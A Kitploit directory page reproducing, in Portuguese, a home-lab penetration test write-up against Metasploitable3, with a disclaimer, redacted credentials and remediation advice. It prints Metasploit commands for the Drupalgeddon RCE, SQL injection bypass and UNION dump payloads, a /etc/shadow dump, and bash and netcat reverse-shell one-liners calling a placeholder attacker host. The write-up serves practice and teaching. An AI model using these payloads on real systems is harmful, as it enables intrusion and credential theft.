Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalada de PrivilégiosReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoCTFTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Labs e Prática
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Relatório de teste de penetração em home-lab do Metasploitable3 cobrindo reconhecimento com Nmap, RCE do Drupalgeddon, injeção de SQL, reutilização de credenciais SSH, escalonamento de privilégios via sudo e reverse shells.

Ver Repositório
1há 19h 15mAinda não revisado

Metasploitable3 — Relatório de Teste de Penetração

Autor: Arlen Fortunato
Data: Setembro de 2026
Ambiente: Parrot OS (atacante) → Metasploitable3 Ubuntu 14.04 (alvo)
Escopo: Teste de penetração de rede completo — enumeração, exploração, privesc, pós-exploração
Tipo: Home Lab / Prática de Capture The Flag

⚠️ Todas as credenciais abaixo estão censuradas. Este foi um exercício legal e isolado em home-lab.


Ferramentas Utilizadas

FerramentaFunção
NmapVarredura de portas, detecção de serviço/versão, fingerprint de SO
Metasploit (msfconsole)Exploração (CVE-2014-3704), gerenciamento de sessões
msfvenomGeração de payload (reverse shells bash/netcat)
nc (netcat)Listener de reverse shell
curl / sedCriação manual de SQLi + formatação de saída HTML
ssh / scpAcesso remoto, validação de credenciais
openssl s_clientVerificação de serviço TLS/SSL
gobusterForça bruta de diretórios (enumeração web)

Reconhecimento — Varredura Completa de Portas com Nmap

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

SO: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Resumo dos Achados


Detalhes dos Achados

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Falso Positivo

Vulnerabilidade: O UnrealIRCd 3.2.8.1 foi historicamente distribuído com um binário trojanizado que executa comandos arbitrários quando um cliente não autenticado envia uma string de gatilho antes do registro — RCE como o usuário do daemon IRC.

Tentativa de exploração: Módulo Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor com payloads cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. A verificação automática do módulo reportou o serviço como vulnerável; nenhuma sessão retornou em nenhum payload.

Solução de problemas realizada:

  • Porta acessível (nc -vz)
  • Porta confirmada como IRC em texto claro, não TLS (openssl s_client)
  • Conexão reversa manual a partir do alvo confirmou que a rede de saída funciona
  • Gatilho manual do backdoor via nc retornou erro de protocolo IRC 451 — comando interpretado como comando IRC, nunca executado

Conclusão: O banner de versão indica a build vulnerável, mas o backdoor está ausente nesta instância (binário limpo/recompilado). Classificado como não explorável — falso positivo, com evidências.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnerabilidade: O Drupal 7.x anterior ao 7.32 contém uma injeção SQL crítica na camada de abstração de banco de dados, permitindo execução remota de código não autenticada.

Confirmação de versão: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Exploração:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Resultado:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Enumeração pós-exploração:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 contas de usuário

3. Aplicação de Folha de Pagamento — Injeção SQL Baseada em UNION (Manual)

Vulnerabilidade: Formulário de login do payroll_app.php, injeção SQL no campo de senha. Nenhuma automação utilizada — criada via curl.

Passo 1 — Bypass de autenticação:

root@kitploit:~
' or 1=1#

' fecha a string SQL, or 1=1 força verdadeiro, # comenta a aspa final.

Passo 2 — Contagem de colunas + mapeamento de exibição:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- sem erro = 4 colunas
' UNION SELECT 1, 2, 3, 4#                 -- marcadores: 1=Username, 2=First, 3=Last, 4=Salary

Passo 3 — Enumeração do information_schema:

PerguntaResposta
Versão do BD / usuárioMySQL 5.5.62, root@localhost

Passo 4 — Dump (senhas censuradas):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — Credenciais Padrão e Reutilização de Credenciais

Caminho 1 — Conta padrão: par de credenciais padrão vagrant autenticado via SSH → usuário no grupo sudo com (ALL : ALL) NOPASSWD: ALL.

Caminho 2 — Reutilização de credenciais: credenciais obtidas do dump de SQLi autenticaram diretamente via SSH como outro usuário do lab (luke_skywalker, grupo sudo, (ALL : ALL) ALL).

Significância: demonstra reutilização de credenciais entre serviços — credenciais de aplicação mapeadas para uma conta de sistema.


5. Escalação de Privilégios (Dois Caminhos)

  • Caminho A: vagrant → sudo -l mostra NOPASSWD: ALL → sudo su - → uid=0(root).
  • Caminho B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

Nenhum exploit local necessário — ambas as contas possuem permissões sudo excessivamente permissivas.


6. Dump do Shadow

root@kitploit:~
sudo cat /etc/shadow

Extraídos 16 hashes md5crypt ($1$) — coleta completa de credenciais após privesc.


7. Pós-Exploração — Reverse Shells

Payload 1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Capturado em nc -lnvp 4444 → shell interativo.

Payload 2 — netcat (named-pipe):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Capturado em nc -lnvp 4445 → shell interativo.

Mecanismo: named pipe (FIFO) conecta stdin/stdout do netcat ao /bin/sh, formando um túnel bidirecional de socket único; FIFO removido após o uso.


Recomendações de Remediação


Aviso Legal

Todos os testes foram realizados exclusivamente em um home lab isolado usando software intencionalmente vulnerável (Rapid7 Metasploitable3). Nenhum sistema de produção ou alvo não autorizado foi envolvido. Este relatório é apenas para fins educacionais e desenvolvimento pessoal de habilidades.

Baixar ferramenta
PortaEstadoServiçoVersão
21/tcpabertaFTPProFTPD 1.3.5
22/tcpabertaSSHOpenSSH 6.6.1p1
80/tcpabertaHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpabertaSMBSamba smbd 3.X–4.X
631/tcpabertaIPPCUPS 1.7
3306/tcpabertaMySQLMySQL (não autorizado)
3500/tcpabertaHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpabertaIRCUnrealIRCd
8080/tcpabertaHTTPJetty 8.1.7.v20120910
#VulnerabilidadeCVE / TipoPortaSeveridadeResultado
1Fingerprint de versão do UnrealIRCd — sondagem de backdoorCVE-2010-20756697⚠️ Falso positivoVerificação automática do módulo passou, sondagem manual falhou — backdoor ausente na build
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CríticaShell Meterpreter como www-data
3Aplicação de folha de pagamento — SQLi UNION (manual)Injeção manual80🔴 CríticaDump completo do BD (15 usuários, senhas em texto claro — censuradas)
4SSH — credenciais padrão + reutilizadasPadrão / reutilização de credenciais22🔴 Críticavagrant (NOPASSWD sudo), luke_skywalker (sudo ALL)
5Escalação de privilégios (dois caminhos)sudo mal configuradoN/A🔴 Críticaroot via ambas as contas
6Dump do shadowPós-exploraçãoN/A🔴 Crítica16 hashes md5crypt extraídos
7Reverse shells (bash + netcat)msfvenom / criação manual4444/4445🟠 AltaShells interativos capturados no listener do atacante
Bancos de dadosinformation_schema, drupal, mysql, payroll, performance_schema
Tabelas em payrollusers
Colunas em usersusername, first_name, last_name, password, salary
UsernameSenhaSalário
leia_organa[CENSURADO]9560
luke_skywalker[CENSURADO]1080
han_solo[CENSURADO]1200
artoo_detoo[CENSURADO]22222
boba_fett[CENSURADO]20000
greedo[CENSURADO]50000
(+ 9 outras contas)[CENSURADO]—
AchadoRecomendação
Fingerprint de versão do UnrealIRCdVerificar integridade da origem do binário (checksums); atualizar ou remover
Drupal 7.5Atualizar para a versão estável mais recente; aplicar SA-CORE-2014-005
SQLi na folha de pagamentoConsultas parametrizadas / prepared statements; validar entrada
Credenciais SSH padrãoRotacionar/remover contas padrão; exigir autenticação por chave
Sudo com privilégios excessivosAplicar princípio do menor privilégio; remover concessões NOPASSWD irrestritas
Reutilização de credenciaisExigir senhas únicas por serviço; política de senhas
Hashing de senha fracoMigrar md5crypt → bcrypt / Argon2id